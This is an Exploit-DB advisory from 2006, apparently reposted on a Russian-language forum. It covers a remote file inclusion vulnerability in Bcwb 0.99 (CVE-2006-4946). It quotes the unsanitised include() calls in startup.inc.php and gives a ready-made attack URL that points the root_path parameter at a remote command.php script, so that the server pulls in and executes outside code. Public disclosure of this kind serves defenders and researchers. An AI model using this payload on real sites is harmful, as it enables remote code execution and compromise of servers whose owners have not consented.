- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2399
- Проверка EDB
-
- Пройдено
- Автор
- AJANN
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4946
- Дата публикации
- 2006-09-19
Код:
*******************************************************************************
# Title : Bcwb 0.99(root_path)Remote File Include Vulnerability
# Author : ajann
# Greetz : shadow and Suskun for host : )
# Exploit;
*******************************************************************************
[File]
startup.inc.php
[/File]
[Code,1]
startup.inc.php Error:
..
....
// Debug services
include($root_path.'include/startup/debug.inc.php');
include($root_path.'include/startup/common_functions.inc.php');
include($root_path.'include/lib/data.lib.php');
....
..
Key [:] root_path=http://target.com/command.php?
\Example:
http://target.com/include/startup.inc.php?root_path=http://target.com/command.php?
# ajann,Turkey
# ...
# Im not Hacker!
# milw0rm.com [2006-09-19]- Источник
- www.exploit-db.com
